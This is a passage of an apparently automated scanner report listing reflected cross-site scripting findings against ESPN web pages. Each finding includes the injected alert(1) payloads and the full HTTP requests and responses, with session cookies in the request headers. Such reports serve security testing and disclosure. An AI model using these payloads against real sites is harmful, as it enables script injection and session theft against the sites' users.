Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:18:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:18:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 14:26:27 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2752

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'5654897dfe78</script><script>alert(1)
...[SNIP]...
<param name="movie" value="http://espn.go.com/videohub/mpf/players/design09/iFrame.swf?id=5654897dfe78</script><script>alert(1)</script>983380015ec&autostart=false&playerType=iFrame09" />
...[SNIP]...

5.23. http://espn.go.com/videohub/mpf/frame/playerEmbed [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b19d"><script>alert(1)</script>5126c3ab88e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videohub/mpf/frame/playerEmbed?id=56548979b19d"><script>alert(1)</script>5126c3ab88e&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:17:56 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:17:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 14:26:13 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2710

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'56548979b19d"><script>alert(1)</scrip
...[SNIP]...
<div id="videoEmbed56548979b19d"><script>alert(1)</script>5126c3ab88e">
...[SNIP]...

5.24. http://espn.go.com/videohub/mpf/frame/playerEmbed [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a75'%3balert(1)//eef911a8eef was submitted in the id parameter. This input was echoed as 50a75';alert(1)//eef911a8eef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=565489750a75'%3balert(1)//eef911a8eef&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:17:41 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:17:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 14:26:01 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2620

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'565489750a75';alert(1)//eef911a8eef','player':'iFrame09','width':'432','height':'2431a1a5';alert(1)//f13274ea7b9','adminOver':'3805638','autoStart':'false'};
</script>
...[SNIP]...

5.25. http://espn.go.com/videohub/mpf/frame/playerEmbed [omniPageName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the omniPageName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c58"%3balert(1)//be026dd05fd was submitted in the omniPageName parameter. This input was echoed as a6c58";alert(1)//be026dd05fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickema6c58"%3balert(1)//be026dd05fd HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:21:08 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:21:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN22
Cache-Expires: Sat, 06 Nov 2010 14:29:28 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2910

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'5654897','player':'iFrame09','width':
...[SNIP]...
<script language="JavaScript" type="text/javascript">var omniPageName="fantasy:poker:pokerpickema6c58";alert(1)//be026dd05fd"</script>
...[SNIP]...

5.26. http://espn.go.com/videohub/mpf/frame/playerEmbed [player parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the player request parameter is copied into a JavaScript rest-of-line comment. The payload 79c55</script><script>alert(1)</script>f04c1eba61f was submitted in the player parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame0979c55</script><script>alert(1)</script>f04c1eba61f&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:18:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:18:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 14:27:02 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 3132

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'5654897','player':'iFrame0979c55</scr
...[SNIP]...
<param name="movie" value="http://espn.go.com/videohub/mpf/players/design09/iFrame.swf?id=5654897&autostart=false&playerType=iFrame0979c55</script><script>alert(1)</script>f04c1eba61f" />
...[SNIP]...

5.27. http://espn.go.com/videohub/mpf/frame/playerEmbed [player parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the player request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e261'%3balert(1)//073d4ffc633 was submitted in the player parameter. This input was echoed as 6e261';alert(1)//073d4ffc633 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame096e261'%3balert(1)//073d4ffc633&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:18:34 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:18:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 14:26:54 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 3022

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'5654897','player':'iFrame096e261';alert(1)//073d4ffc633','width':'432','height':'2431a1a5';alert(1)//f13274ea7b9','adminOver':'3805638','autoStart':'false'};
</script>
...[SNIP]...

5.28. http://espn.go.com/videohub/mpf/frame/playerEmbed [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/frame/playerEmbed

Issue detail

The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c16e'%3balert(1)//7133253776d was submitted in the width parameter. This input was echoed as 4c16e';alert(1)//7133253776d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=4324c16e'%3balert(1)//7133253776d&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:19:56 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:19:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN04
Cache-Expires: Sat, 06 Nov 2010 14:28:16 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 3106

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript">
mediaTrackingVars = {'id':'5654897','player':'iFrame09','width':'4324c16e';alert(1)//7133253776d','height':'2431a1a5';alert(1)//f13274ea7b9','adminOver':'3805638','autoStart':'false'};
</script>
...[SNIP]...

5.29. http://g.espncdn.com/mpcommons/static/css/main [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.espncdn.com
Path:   /mpcommons/static/css/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b83e1<script>alert(1)</script>d5ce256c82c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main HTTP/1.1
Host: g.espncdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Cnection: Close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Date: Sat, 06 Nov 2010 16:11:27 GMT
Connection: close

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main</BODY></HTML>

5.30. http://g.espncdn.com/mpcommons/static/css/main [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.espncdn.com
Path:   /mpcommons/static/css/main

Issue detail

